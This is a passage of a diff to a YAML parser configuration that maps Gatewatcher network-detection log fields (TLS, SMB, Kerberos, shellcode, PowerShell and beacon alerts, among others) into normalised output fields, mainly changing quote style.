"{{json_load.message.user_agent.os.version}}" + user_agent.device.name: "{{json_load.message.user_agent.device.name}}" + gatewatcher.user_agent.major: "{{json_load.message.user_agent.major}}" + gatewatcher.user_agent.minor: "{{json_load.message.user_agent.minor}}" + gatewatcher.user_agent.patch: "{{json_load.message.user_agent.patch}}" + gatewatcher.user_agent.os.major: "{{json_load.message.user_agent.os.major}}" version: actions: - set: gatewatcher.version: '{{json_load.message["@version"]}}' - filter: '' - name: set tls: actions: - set: - tls.version: '{{json_load.message.tls.version}}' - gatewatcher.tls: 
'{{json_load.message.tls}}' - tls.server.issuer: '{{json_load.message.tls.server.issuer}}' - tls.server.subject: '{{json_load.message.tls.server.subject}}' - tls.server.hash.md5: '{{json_load.message.tls.server.hash.md5}}' - tls.server.hash.sha1: '{{json_load.message.tls.server.hash.sha1}}' - tls.client.server_name: '{{json_load.message.tls.client.server_name}}' - tls.server.certificate: '{{json_load.message.tls.server.certificate}}' - tls.server.hash.sha256: '{{json_load.message.tls.server.hash.sha256}}' - tls.server.certificate_chain: '{{json_load.message.tls.server.certificate.chain}}' - filter: '' - name: set + tls.version: "{{json_load.message.tls.version}}" + gatewatcher.tls: "{{json_load.message.tls}}" + tls.server.issuer: "{{json_load.message.tls.server.issuer}}" + tls.server.subject: "{{json_load.message.tls.server.subject}}" + tls.server.hash.md5: "{{json_load.message.tls.server.hash.md5}}" + tls.server.hash.sha1: "{{json_load.message.tls.server.hash.sha1}}" + tls.client.server_name: "{{json_load.message.tls.client.server_name}}" + tls.server.certificate: "{{json_load.message.tls.server.certificate}}" + tls.server.hash.sha256: "{{json_load.message.tls.server.hash.sha256}}" + tls.server.certificate_chain: "{{json_load.message.tls.server.certificate.chain}}" metadata-flowbits: actions: - set: - gatewatcher.metadata.flowbits: '{{json_load.message.metadata.flowbits}}' - filter: '' - name: set + gatewatcher.metadata.flowbits: "{{json_load.message.metadata.flowbits}}" smtp: actions: - set: - gatewatcher.smtp.helo: '{{json_load.message.smtp.helo}}' - gatewatcher.smtp.rcpt_to: '{{json_load.message.smtp.rcpt_to}}' - gatewatcher.smtp.mail_from: '{{json_load.message.smtp.mail_from}}' - filter: '' - name: set + gatewatcher.smtp.helo: "{{json_load.message.smtp.helo}}" + gatewatcher.smtp.rcpt_to: "{{json_load.message.smtp.rcpt_to}}" + gatewatcher.smtp.mail_from: "{{json_load.message.smtp.mail_from}}" email: actions: - set: - email.subject: 
'{{json_load.message.email.subject}}' - email.message_id: '{{json_load.message.email.message_id}}' - email.attachments: '{{json_load.message.email.attachments}}' - email.to.address: '{{json_load.message.email.to}}' - email.from.address: '{{json_load.message.email.from}}' - gatewatcher.email.status: '{{json_load.message.email.status}}' - gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}' - gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}' - filter: '' - name: set + email.subject: "{{json_load.message.email.subject}}" + email.message_id: "{{json_load.message.email.message_id}}" + email.attachments: "{{json_load.message.email.attachments}}" + email.to.address: "{{json_load.message.email.to}}" + email.from.address: "{{json_load.message.email.from}}" + gatewatcher.email.status: "{{json_load.message.email.status}}" + gatewatcher.email.body_md5: "{{json_load.message.email.body_md5}}" + gatewatcher.email.subject_md5: "{{json_load.message.email.subject_md5}}" smb: actions: - set: - gatewatcher.smb.id: '{{json_load.message.smb.id}}' - gatewatcher.smb.status: '{{json_load.message.smb.status}}' - gatewatcher.smb.command: '{{json_load.message.smb.command}}' - gatewatcher.smb.dialect: '{{json_load.message.smb.dialect}}' - gatewatcher.smb.tree_id: '{{json_load.message.smb.tree_id}}' - gatewatcher.smb.session_id: '{{json_load.message.smb.session_id}}' - gatewatcher.smb.status_code: '{{json_load.message.smb.status_code}}' - filter: '' - name: set + gatewatcher.smb.id: "{{json_load.message.smb.id}}" + gatewatcher.smb.status: "{{json_load.message.smb.status}}" + gatewatcher.smb.command: "{{json_load.message.smb.command}}" + gatewatcher.smb.dialect: "{{json_load.message.smb.dialect}}" + gatewatcher.smb.tree_id: "{{json_load.message.smb.tree_id}}" + gatewatcher.smb.session_id: "{{json_load.message.smb.session_id}}" + gatewatcher.smb.status_code: "{{json_load.message.smb.status_code}}" nfs: actions: - set: - gatewatcher.nfs.id: 
'{{json_load.message.nfs.id}}' - gatewatcher.nfs.type: '{{json_load.message.nfs.type}}' - gatewatcher.nfs.hhash: '{{json_load.message.nfs.hhash}}' - gatewatcher.nfs.status: '{{json_load.message.nfs.status}}' - gatewatcher.nfs.file_tx: '{{json_load.message.nfs.file_tx}}' - gatewatcher.nfs.version: '{{json_load.message.nfs.version}}' - gatewatcher.nfs.filename: '{{json_load.message.nfs.filename}}' - gatewatcher.nfs.procedure: '{{json_load.message.nfs.procedure}}' - filter: '' - name: set + gatewatcher.nfs.id: "{{json_load.message.nfs.id}}" + gatewatcher.nfs.type: "{{json_load.message.nfs.type}}" + gatewatcher.nfs.hhash: "{{json_load.message.nfs.hhash}}" + gatewatcher.nfs.status: "{{json_load.message.nfs.status}}" + gatewatcher.nfs.file_tx: "{{json_load.message.nfs.file_tx}}" + gatewatcher.nfs.version: "{{json_load.message.nfs.version}}" + gatewatcher.nfs.filename: "{{json_load.message.nfs.filename}}" + gatewatcher.nfs.procedure: "{{json_load.message.nfs.procedure}}" ftp: actions: - set: - gatewatcher.ftp.reply: '{{json_load.message.ftp.reply}}' - gatewatcher.ftp.reply_received: '{{json_load.message.ftp.reply_received}}' - gatewatcher.ftp.completion_code: '{{json_load.message.ftp.completion_code}}' - gatewatcher.ftp.reply_truncated: '{{json_load.message.ftp.reply_truncated}}' - filter: '' - name: set + gatewatcher.ftp.reply: "{{json_load.message.ftp.reply}}" + gatewatcher.ftp.reply_received: "{{json_load.message.ftp.reply_received}}" + gatewatcher.ftp.completion_code: "{{json_load.message.ftp.completion_code}}" + gatewatcher.ftp.reply_truncated: "{{json_load.message.ftp.reply_truncated}}" tftp: actions: - set: - gatewatcher.tftp.file: '{{json_load.message.tftp.file}}' - gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}' - gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}' - filter: '' - name: set + gatewatcher.tftp.file: "{{json_load.message.tftp.file}}" + gatewatcher.tftp.mode: "{{json_load.message.tftp.mode}}" + gatewatcher.tftp.packet: 
"{{json_load.message.tftp.packet}}" ssh: actions: - set: - gatewatcher.ssh.client.hassh: '{{json_load.message.ssh.client.hassh}}' - gatewatcher.ssh.server.hassh: '{{json_load.message.ssh.server.hassh}}' - gatewatcher.ssh.client.proto_version: '{{json_load.message.ssh.client.proto_version}}' - gatewatcher.ssh.server.proto_version: '{{json_load.message.ssh.server.proto_version}}' - gatewatcher.ssh.client.software_version: '{{json_load.message.ssh.client.software_version}}' - gatewatcher.ssh.server.software_version: '{{json_load.message.ssh.server.software_version}}' - filter: '' - name: set + gatewatcher.ssh.client.hassh: "{{json_load.message.ssh.client.hassh}}" + gatewatcher.ssh.server.hassh: "{{json_load.message.ssh.server.hassh}}" + gatewatcher.ssh.client.proto_version: "{{json_load.message.ssh.client.proto_version}}" + gatewatcher.ssh.server.proto_version: "{{json_load.message.ssh.server.proto_version}}" + gatewatcher.ssh.client.software_version: "{{json_load.message.ssh.client.software_version}}" + gatewatcher.ssh.server.software_version: "{{json_load.message.ssh.server.software_version}}" krb5: actions: - set: - gatewatcher.krb5.cname: '{{json_load.message.krb5.cname}}' - gatewatcher.krb5.realm: '{{json_load.message.krb5.realm}}' - gatewatcher.krb5.sname: '{{json_load.message.krb5.sname}}' - gatewatcher.krb5.msg_type: '{{json_load.message.krb5.msg_type}}' - gatewatcher.krb5.encryption: '{{json_load.message.krb5.encryption}}' - gatewatcher.krb5.error_code: '{{json_load.message.krb5.error_code}}' - gatewatcher.krb5.failed_request: '{{json_load.message.krb5.failed_request}}' - gatewatcher.krb5.weak_encryption: '{{json_load.message.krb5.weak_encryption}}' - filter: '' - name: set + gatewatcher.krb5.cname: "{{json_load.message.krb5.cname}}" + gatewatcher.krb5.realm: "{{json_load.message.krb5.realm}}" + gatewatcher.krb5.sname: "{{json_load.message.krb5.sname}}" + gatewatcher.krb5.msg_type: "{{json_load.message.krb5.msg_type}}" + gatewatcher.krb5.encryption: 
"{{json_load.message.krb5.encryption}}" + gatewatcher.krb5.error_code: "{{json_load.message.krb5.error_code}}" + gatewatcher.krb5.failed_request: "{{json_load.message.krb5.failed_request}}" + gatewatcher.krb5.weak_encryption: "{{json_load.message.krb5.weak_encryption}}" dhcp: actions: - set: - gatewatcher.dhcp.id: '{{json_load.message.dhcp.id}}' - gatewatcher.dhcp.type: '{{json_load.message.dhcp.type}}' - gatewatcher.dhcp.routers: '{{json_load.message.dhcp.routers}}' - gatewatcher.dhcp.hostname: '{{json_load.message.dhcp.hostname}}' - gatewatcher.dhcp.relay_ip: '{{json_load.message.dhcp.relay_ip}}' - gatewatcher.dhcp.client_ip: '{{json_load.message.dhcp.client_ip}}' - gatewatcher.dhcp.dhcp_type: '{{json_load.message.dhcp.dhcp_type}}' - gatewatcher.dhcp.client_mac: '{{json_load.message.dhcp.client_mac}}' - gatewatcher.dhcp.lease_time: '{{json_load.message.dhcp.lease_time}}' - gatewatcher.dhcp.assigned_ip: '{{json_load.message.dhcp.assigned_ip}}' - gatewatcher.dhcp.dns_servers: '{{json_load.message.dhcp.dns_servers}}' - gatewatcher.dhcp.subnet_mask: '{{json_load.message.dhcp.subnet_mask}}' - gatewatcher.dhcp.next_server_ip: '{{json_load.message.dhcp.next_server_ip}}' - filter: '' - name: set + gatewatcher.dhcp.id: "{{json_load.message.dhcp.id}}" + gatewatcher.dhcp.type: "{{json_load.message.dhcp.type}}" + gatewatcher.dhcp.routers: "{{json_load.message.dhcp.routers}}" + gatewatcher.dhcp.hostname: "{{json_load.message.dhcp.hostname}}" + gatewatcher.dhcp.relay_ip: "{{json_load.message.dhcp.relay_ip}}" + gatewatcher.dhcp.client_ip: "{{json_load.message.dhcp.client_ip}}" + gatewatcher.dhcp.dhcp_type: "{{json_load.message.dhcp.dhcp_type}}" + gatewatcher.dhcp.client_mac: "{{json_load.message.dhcp.client_mac}}" + gatewatcher.dhcp.lease_time: "{{json_load.message.dhcp.lease_time}}" + gatewatcher.dhcp.assigned_ip: "{{json_load.message.dhcp.assigned_ip}}" + gatewatcher.dhcp.dns_servers: "{{json_load.message.dhcp.dns_servers}}" + gatewatcher.dhcp.subnet_mask: 
"{{json_load.message.dhcp.subnet_mask}}" + gatewatcher.dhcp.next_server_ip: "{{json_load.message.dhcp.next_server_ip}}" ftp_data: actions: - set: - gatewatcher.ftp_data.command: '{{json_load.message.ftp_data.command}}' - gatewatcher.ftp_data.filename: '{{json_load.message.ftp_data.filename}}' - filter: '' - name: set + gatewatcher.ftp_data.command: "{{json_load.message.ftp_data.command}}" + gatewatcher.ftp_data.filename: "{{json_load.message.ftp_data.filename}}" snmp: actions: - set: - gatewatcher.snmp.vars: '{{json_load.message.snmp.vars}}' - gatewatcher.snmp.version: '{{json_load.message.snmp.version}}' - gatewatcher.snmp.pdu_type: '{{json_load.message.snmp.pdu_type}}' - gatewatcher.snmp.community: '{{json_load.message.snmp.community}}' - filter: '' - name: set + gatewatcher.snmp.vars: "{{json_load.message.snmp.vars}}" + gatewatcher.snmp.version: "{{json_load.message.snmp.version}}" + gatewatcher.snmp.pdu_type: "{{json_load.message.snmp.pdu_type}}" + gatewatcher.snmp.community: "{{json_load.message.snmp.community}}" rdp: actions: - set: - gatewatcher.rdp.tx_id: '{{json_load.message.rdp.tx_id}}' - gatewatcher.rdp.client: '{{json_load.message.rdp.client}}' - gatewatcher.rdp.cookie: '{{json_load.message.rdp.cookie}}' - gatewatcher.rdp.channels: '{{json_load.message.rdp.channels}}' - gatewatcher.rdp.protocol: '{{json_load.message.rdp.protocol}}' - gatewatcher.rdp.event_type: '{{json_load.message.rdp.event_type}}' - gatewatcher.rdp.server_supports: '{{json_load.message.rdp.server_supports}}' - filter: '' - name: set + gatewatcher.rdp.tx_id: "{{json_load.message.rdp.tx_id}}" + gatewatcher.rdp.client: "{{json_load.message.rdp.client}}" + gatewatcher.rdp.cookie: "{{json_load.message.rdp.cookie}}" + gatewatcher.rdp.channels: "{{json_load.message.rdp.channels}}" + gatewatcher.rdp.protocol: "{{json_load.message.rdp.protocol}}" + gatewatcher.rdp.event_type: "{{json_load.message.rdp.event_type}}" + gatewatcher.rdp.server_supports: "{{json_load.message.rdp.server_supports}}" 
rfb:
 actions:
 - set:
- gatewatcher.rfb.authentication: '{{json_load.message.rfb.authentication}}'
- gatewatcher.rfb.client_protocol_version: '{{json_load.message.rfb.client_protocol_version}}'
- gatewatcher.rfb.server_protocol_version: '{{json_load.message.rfb.server_protocol_version}}'
- gatewatcher.rfb.server_security_failure_reason: '{{json_load.message.rfb.server_security_failure_reason}}'
- filter: ''
- name: set
+ gatewatcher.rfb.authentication: "{{json_load.message.rfb.authentication}}"
+ gatewatcher.rfb.client_protocol_version: "{{json_load.message.rfb.client_protocol_version}}"
+ gatewatcher.rfb.server_protocol_version: "{{json_load.message.rfb.server_protocol_version}}"
+ gatewatcher.rfb.server_security_failure_reason: "{{json_load.message.rfb.server_security_failure_reason}}"
 ikev2:
 actions:
 - set:
- gatewatcher.ikev2.role: '{{json_load.message.ikev2.role}}'
- gatewatcher.ikev2.errors: '{{json_load.message.ikev2.errors}}'
- gatewatcher.ikev2.notify: '{{json_load.message.ikev2.notify}}'
- gatewatcher.ikev2.payload: '{{json_load.message.ikev2.payload}}'
- gatewatcher.ikev2.init_spi: '{{json_load.message.ikev2.init_spi}}'
- gatewatcher.ikev2.resp_spi: '{{json_load.message.ikev2.resp_spi}}'
- gatewatcher.ikev2.message_id: '{{json_load.message.ikev2.message_id}}'
- gatewatcher.ikev2.exchange_type: '{{json_load.message.ikev2.exchange_type}}'
- gatewatcher.ikev2.version_major: '{{json_load.message.ikev2.version_major}}'
- gatewatcher.ikev2.version_minor: '{{json_load.message.ikev2.version_minor}}'
- filter: ''
- name: set
+ gatewatcher.ikev2.role: "{{json_load.message.ikev2.role}}"
+ gatewatcher.ikev2.errors: "{{json_load.message.ikev2.errors}}"
+ gatewatcher.ikev2.notify: "{{json_load.message.ikev2.notify}}"
+ gatewatcher.ikev2.payload: "{{json_load.message.ikev2.payload}}"
+ gatewatcher.ikev2.init_spi: "{{json_load.message.ikev2.init_spi}}"
+ gatewatcher.ikev2.resp_spi: "{{json_load.message.ikev2.resp_spi}}"
+ gatewatcher.ikev2.message_id: 
"{{json_load.message.ikev2.message_id}}" + gatewatcher.ikev2.exchange_type: "{{json_load.message.ikev2.exchange_type}}" + gatewatcher.ikev2.version_major: "{{json_load.message.ikev2.version_major}}" + gatewatcher.ikev2.version_minor: "{{json_load.message.ikev2.version_minor}}" sip: actions: - set: - gatewatcher.sip.uri: '{{json_load.message.sip.uri}}' - gatewatcher.sip.method: '{{json_load.message.sip.method}}' - gatewatcher.sip.version: '{{json_load.message.sip.version}}' - gatewatcher.sip.request_line: '{{json_load.message.sip.request_line}}' - filter: '' - name: set + gatewatcher.sip.uri: "{{json_load.message.sip.uri}}" + gatewatcher.sip.method: "{{json_load.message.sip.method}}" + gatewatcher.sip.version: "{{json_load.message.sip.version}}" + gatewatcher.sip.request_line: "{{json_load.message.sip.request_line}}" dnp3: actions: - set: - gatewatcher.dnp3.dst: '{{json_load.message.dnp3.dst}}' - gatewatcher.dnp3.iin: '{{json_load.message.dnp3.iin}}' - gatewatcher.dnp3.src: '{{json_load.message.dnp3.src}}' - gatewatcher.dnp3.type: '{{json_load.message.dnp3.type}}' - gatewatcher.dnp3.control: '{{json_load.message.dnp3.control}}' - gatewatcher.dnp3.application: '{{json_load.message.dnp3.application}}' - filter: '' - name: set + gatewatcher.dnp3.dst: "{{json_load.message.dnp3.dst}}" + gatewatcher.dnp3.iin: "{{json_load.message.dnp3.iin}}" + gatewatcher.dnp3.src: "{{json_load.message.dnp3.src}}" + gatewatcher.dnp3.type: "{{json_load.message.dnp3.type}}" + gatewatcher.dnp3.control: "{{json_load.message.dnp3.control}}" + gatewatcher.dnp3.application: "{{json_load.message.dnp3.application}}" dcerpc: actions: - set: - gatewatcher.dcerpc.req: '{{json_load.message.dcerpc.req}}' - gatewatcher.dcerpc.res: '{{json_load.message.dcerpc.res}}' - gatewatcher.dcerpc.call_id: '{{json_load.message.dcerpc.call_id}}' - gatewatcher.dcerpc.request: '{{json_load.message.dcerpc.request}}' - gatewatcher.dcerpc.response: '{{json_load.message.dcerpc.response}}' - gatewatcher.dcerpc.interfaces: 
'{{json_load.message.dcerpc.interfaces}}'
- gatewatcher.dcerpc.rpc_version: '{{json_load.message.dcerpc.rpc_version}}'
- filter: ''
- name: set
+ gatewatcher.dcerpc.req: "{{json_load.message.dcerpc.req}}"
+ gatewatcher.dcerpc.res: "{{json_load.message.dcerpc.res}}"
+ gatewatcher.dcerpc.call_id: "{{json_load.message.dcerpc.call_id}}"
+ gatewatcher.dcerpc.request: "{{json_load.message.dcerpc.request}}"
+ gatewatcher.dcerpc.response: "{{json_load.message.dcerpc.response}}"
+ gatewatcher.dcerpc.interfaces: "{{json_load.message.dcerpc.interfaces}}"
+ gatewatcher.dcerpc.rpc_version: "{{json_load.message.dcerpc.rpc_version}}"
 mqtt:
 actions:
 - set:
- gatewatcher.mqtt.connack: '{{json_load.message.mqtt.connack}}'
- filter: ''
- name: set
+ gatewatcher.mqtt.connack: "{{json_load.message.mqtt.connack}}"
 malcore:
 actions:
 - set:
- gatewatcher.malcore.code: '{{json_load.message.malcore.code}}'
- gatewatcher.malcore.state: '{{json_load.message.malcore.state}}'
- gatewatcher.malcore.engine_id: '{{json_load.message.malcore.engine_id}}'
- gatewatcher.malcore.file_type: '{{json_load.message.malcore.file_type}}'
- gatewatcher.malcore.total_found: '{{json_load.message.malcore.total_found}}'
- gatewatcher.malcore.analyzers_up: '{{json_load.message.malcore.analyzers_up}}'
- gatewatcher.malcore.magic_details: '{{json_load.message.malcore.magic_details}}'
- gatewatcher.malcore.analyzed_clean: '{{json_load.message.malcore.analyzed_clean}}'
- gatewatcher.malcore.analyzed_error: '{{json_load.message.malcore.analyzed_error}}'
- gatewatcher.malcore.analyzed_other: '{{json_load.message.malcore.analyzed_other}}'
- gatewatcher.malcore.processing_time: '{{json_load.message.malcore.processing_time}}'
- gatewatcher.malcore.reporting_token: '{{json_load.message.malcore.reporting_token}}'
- gatewatcher.malcore.detail_scan_time: '{{json_load.message.malcore.detail_scan_time}}'
- gatewatcher.malcore.detail_wait_time: '{{json_load.message.malcore.detail_wait_time}}'
- 
gatewatcher.malcore.analyzed_infected: '{{json_load.message.malcore.analyzed_infected}}'
- gatewatcher.malcore.analyzed_suspicious: '{{json_load.message.malcore.analyzed_suspicious}}'
- gatewatcher.malcore.detail_threat_found: '{{json_load.message.malcore.detail_threat_found}}'
- gatewatcher.malcore.file_type_description: '{{json_load.message.malcore.file_type_description}}'
- gatewatcher.malcore.engines_last_update_date: '{{json_load.message.malcore.engines_last_update_date}}'
- filter: ''
- name: set
+ gatewatcher.malcore.code: "{{json_load.message.malcore.code}}"
+ gatewatcher.malcore.state: "{{json_load.message.malcore.state}}"
+ gatewatcher.malcore.engine_id: "{{json_load.message.malcore.engine_id}}"
+ gatewatcher.malcore.file_type: "{{json_load.message.malcore.file_type}}"
+ gatewatcher.malcore.total_found: "{{json_load.message.malcore.total_found}}"
+ gatewatcher.malcore.analyzers_up: "{{json_load.message.malcore.analyzers_up}}"
+ gatewatcher.malcore.magic_details: "{{json_load.message.malcore.magic_details}}"
+ gatewatcher.malcore.analyzed_clean: "{{json_load.message.malcore.analyzed_clean}}"
+ gatewatcher.malcore.analyzed_error: "{{json_load.message.malcore.analyzed_error}}"
+ gatewatcher.malcore.analyzed_other: "{{json_load.message.malcore.analyzed_other}}"
+ gatewatcher.malcore.processing_time: "{{json_load.message.malcore.processing_time}}"
+ gatewatcher.malcore.reporting_token: "{{json_load.message.malcore.reporting_token}}"
+ gatewatcher.malcore.detail_scan_time: "{{json_load.message.malcore.detail_scan_time}}"
+ gatewatcher.malcore.detail_wait_time: "{{json_load.message.malcore.detail_wait_time}}"
+ gatewatcher.malcore.analyzed_infected: "{{json_load.message.malcore.analyzed_infected}}"
+ gatewatcher.malcore.analyzed_suspicious: "{{json_load.message.malcore.analyzed_suspicious}}"
+ gatewatcher.malcore.detail_threat_found: "{{json_load.message.malcore.detail_threat_found}}"
+ gatewatcher.malcore.file_type_description: 
"{{json_load.message.malcore.file_type_description}}" + gatewatcher.malcore.engines_last_update_date: "{{json_load.message.malcore.engines_last_update_date}}" sigflow: actions: - set: - gatewatcher.sigflow.gid: '{{json_load.message.sigflow.gid}}' - gatewatcher.sigflow.rev: '{{json_load.message.sigflow.rev}}' - gatewatcher.sigflow.action: '{{json_load.message.sigflow.action}}' - gatewatcher.sigflow.packet: '{{json_load.message.sigflow.packet}}' - gatewatcher.sigflow.stream: '{{json_load.message.sigflow.stream}}' - gatewatcher.sigflow.payload: '{{json_load.message.sigflow.payload}}' - gatewatcher.sigflow.category: '{{json_load.message.sigflow.category}}' - gatewatcher.sigflow.metadata: '{{json_load.message.sigflow.metadata}}' - gatewatcher.sigflow.signature: '{{json_load.message.sigflow.signature}}' - gatewatcher.sigflow.packet_info: '{{json_load.message.sigflow.packet_info}}' - gatewatcher.sigflow.signature_id: '{{json_load.message.sigflow.signature_id}}' - gatewatcher.sigflow.payload_printable: '{{json_load.message.sigflow.payload_printable}}' - filter: '' - name: set + gatewatcher.sigflow.gid: "{{json_load.message.sigflow.gid}}" + gatewatcher.sigflow.rev: "{{json_load.message.sigflow.rev}}" + gatewatcher.sigflow.action: "{{json_load.message.sigflow.action}}" + gatewatcher.sigflow.packet: "{{json_load.message.sigflow.packet}}" + gatewatcher.sigflow.stream: "{{json_load.message.sigflow.stream}}" + gatewatcher.sigflow.payload: "{{json_load.message.sigflow.payload}}" + gatewatcher.sigflow.category: "{{json_load.message.sigflow.category}}" + gatewatcher.sigflow.metadata: "{{json_load.message.sigflow.metadata}}" + gatewatcher.sigflow.signature: "{{json_load.message.sigflow.signature}}" + gatewatcher.sigflow.packet_info: "{{json_load.message.sigflow.packet_info}}" + gatewatcher.sigflow.signature_id: "{{json_load.message.sigflow.signature_id}}" + gatewatcher.sigflow.payload_printable: "{{json_load.message.sigflow.payload_printable}}" flow: actions: - set: - 
gatewatcher.flow.start: '{{json_load.message.flow.start}}'
- gatewatcher.flow.pkts_toclient: '{{json_load.message.flow.pkts_toclient}}'
- gatewatcher.flow.pkts_toserver: '{{json_load.message.flow.pkts_toserver}}'
- gatewatcher.flow.bytes_toclient: '{{json_load.message.flow.bytes_toclient}}'
- gatewatcher.flow.bytes_toserver: '{{json_load.message.flow.bytes_toserver}}'
- filter: ''
- name: set
+ gatewatcher.flow.start: "{{json_load.message.flow.start}}"
+ gatewatcher.flow.pkts_toclient: "{{json_load.message.flow.pkts_toclient}}"
+ gatewatcher.flow.pkts_toserver: "{{json_load.message.flow.pkts_toserver}}"
+ gatewatcher.flow.bytes_toclient: "{{json_load.message.flow.bytes_toclient}}"
+ gatewatcher.flow.bytes_toserver: "{{json_load.message.flow.bytes_toserver}}"
 shellcode:
 actions:
 - set:
- gatewatcher.shellcode.id: '{{json_load.message.shellcode.id}}'
- gatewatcher.shellcode.analysis: '{{json_load.message.shellcode.analysis}}'
- gatewatcher.shellcode.sub_type: '{{json_load.message.shellcode.sub_type}}'
- gatewatcher.shellcode.encodings: '{{json_load.message.shellcode.encodings}}'
- gatewatcher.shellcode.sample_id: '{{json_load.message.shellcode.sample_id}}'
- filter: ''
- name: set
+ gatewatcher.shellcode.id: "{{json_load.message.shellcode.id}}"
+ gatewatcher.shellcode.analysis_text: "{{json_load.message.shellcode.analysis}}"
+ gatewatcher.shellcode.sub_type: "{{json_load.message.shellcode.sub_type}}"
+ gatewatcher.shellcode.encodings: "{{json_load.message.shellcode.encodings}}"
+ gatewatcher.shellcode.sample_id: "{{json_load.message.shellcode.sample_id}}"
 malicious_powershell:
 actions:
 - set:
- gatewatcher.malicious_powershell.id: '{{json_load.message.malicious_powershell.id}}'
- gatewatcher.malicious_powershell.score: '{{json_load.message.malicious_powershell.score}}'
- gatewatcher.malicious_powershell.sample_id: '{{json_load.message.malicious_powershell.sample_id}}'
- gatewatcher.malicious_powershell.score_details: 
'{{json_load.message.malicious_powershell.score_details}}'
- gatewatcher.malicious_powershell.proba_obfuscated: '{{json_load.message.malicious_powershell.proba_obfuscated}}'
- filter: ''
- name: set
+ gatewatcher.malicious_powershell.id: "{{json_load.message.malicious_powershell.id}}"
+ gatewatcher.malicious_powershell.score: "{{json_load.message.malicious_powershell.score}}"
+ gatewatcher.malicious_powershell.sample_id: "{{json_load.message.malicious_powershell.sample_id}}"
+ gatewatcher.malicious_powershell.score_details_text: "{{json_load.message.malicious_powershell.score_details}}"
+ gatewatcher.malicious_powershell.proba_obfuscated: "{{json_load.message.malicious_powershell.proba_obfuscated}}"
 files:
 actions:
 - set:
- gatewatcher.files: '{{json_load.message.files}}'
- filter: ''
- name: set
+ gatewatcher.files: "{{json_load.message.files}}"
 history:
 actions:
 - set:
- gatewatcher.history.id: '{{json_load.message.history.id}}'
- gatewatcher.history.ip: '{{json_load.message.history.ip}}'
- gatewatcher.history.code: '{{json_load.message.history.code}}'
- gatewatcher.history.name: '{{json_load.message.history.name}}'
- gatewatcher.history.type: '{{json_load.message.history.type}}'
- gatewatcher.history.method: '{{json_load.message.history.method}}'
- gatewatcher.history.content: '{{json_load.message.history.content}}'
- gatewatcher.history.endpoint: '{{json_load.message.history.endpoint}}'
- filter: ''
- name: set
+ gatewatcher.history.id: "{{json_load.message.history.id}}"
+ gatewatcher.history.ip: "{{json_load.message.history.ip}}"
+ gatewatcher.history.code: "{{json_load.message.history.code}}"
+ gatewatcher.history.name: "{{json_load.message.history.name}}"
+ gatewatcher.history.type: "{{json_load.message.history.type}}"
+ gatewatcher.history.method: "{{json_load.message.history.method}}"
+ gatewatcher.history.content: "{{json_load.message.history.content}}"
+ gatewatcher.history.endpoint: "{{json_load.message.history.endpoint}}"
 syslog:
 actions:
 - set:
- 
network.application: '{{json_load.message.log.syslog.appname}}'
- gatewatcher.syslog.priority: '{{json_load.message.log.syslog.priority}}'
- gatewatcher.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}'
- gatewatcher.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}'
- event.severity: '{{json_load.message.log.syslog.severity.code}}'
- gatewatcher.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}'
- gatewatcher.syslog.message: '{{json_load.message.syslog.message}}'
- filter: ''
- name: set
+ network.application: "{{json_load.message.log.syslog.appname}}"
+ gatewatcher.syslog.priority: "{{json_load.message.log.syslog.priority}}"
+ gatewatcher.syslog.facility.code: "{{json_load.message.log.syslog.facility.code}}"
+ gatewatcher.syslog.facility.name: "{{json_load.message.log.syslog.facility.name}}"
+ event.severity: "{{json_load.message.log.syslog.severity.code}}"
+ gatewatcher.syslog.severity.name: "{{json_load.message.log.syslog.severity.name}}"
+ gatewatcher.syslog.message: "{{json_load.message.syslog.message}}"
 notification:
 actions:
 - set:
- gatewatcher.notification.risk: '{{json_load.message.notification.risk}}'
- gatewatcher.notification.title: '{{json_load.message.notification.title}}'
- gatewatcher.notification.details: '{{json_load.message.notification.details}}'
- gatewatcher.notification.component: '{{json_load.message.notification.component}}'
- gatewatcher.notification.resolution: '{{json_load.message.notification.resolution}}'
- gatewatcher.notification.description: '{{json_load.message.notification.description}}'
- gatewatcher.notification.external_redirection: '{{json_load.message.notification.external_redirection}}'
- gatewatcher.notification.internal_redirection: '{{json_load.message.notification.internal_redirection}}'
- filter: ''
- name: set
+ gatewatcher.notification.risk: "{{json_load.message.notification.risk}}"
+ gatewatcher.notification.title: 
"{{json_load.message.notification.title}}" + gatewatcher.notification.details: "{{json_load.message.notification.details}}" + gatewatcher.notification.component: "{{json_load.message.notification.component}}" + gatewatcher.notification.resolution: "{{json_load.message.notification.resolution}}" + gatewatcher.notification.description: "{{json_load.message.notification.description}}" + gatewatcher.notification.external_redirection: "{{json_load.message.notification.external_redirection}}" + gatewatcher.notification.internal_redirection: "{{json_load.message.notification.internal_redirection}}" beacon: actions: - set: - gatewatcher.beacon.id: '{{json_load.message.beacon.external_redirection}}' - gatewatcher.beacon.type: '{{json_load.message.beacon.type}}' - gatewatcher.beacon.active: '{{json_load.message.beacon.active}}' - gatewatcher.beacon.possible_cnc: '{{json_load.message.beacon.possible_cnc}}' - gatewatcher.beacon.session_count: '{{json_load.message.beacon.session_count}}' - gatewatcher.beacon.mean_time_interval: '{{json_load.message.beacon.mean_time_interval}}' - gatewatcher.beacon.hostname_resolution: '{{json_load.message.beacon.hostname_resolution}}' - filter: '' - name: set + gatewatcher.beacon.id: "{{json_load.message.beacon.external_redirection}}" + gatewatcher.beacon.type: "{{json_load.message.beacon.type}}" + gatewatcher.beacon.active: "{{json_load.message.beacon.active}}" + gatewatcher.beacon.possible_cnc: "{{json_load.message.beacon.possible_cnc}}" + gatewatcher.beacon.session_count: "{{json_load.message.beacon.session_count}}" + gatewatcher.beacon.mean_time_interval: "{{json_load.message.beacon.mean_time_interval}}" + gatewatcher.beacon.hostname_resolution: "{{json_load.message.beacon.hostname_resolution}}" retrohunt: actions: - set: - gatewatcher.matched_event.id: '{{json_load.message.matched_event.id}}' - gatewatcher.matched_event.file.sid: '{{json_load.message.matched_event.file.sid}}' - gatewatcher.matched_event.file.gaps: 
'{{json_load.message.matched_event.file.gaps}}'
- gatewatcher.matched_event.file.name: '{{json_load.message.matched_event.file.name}}'
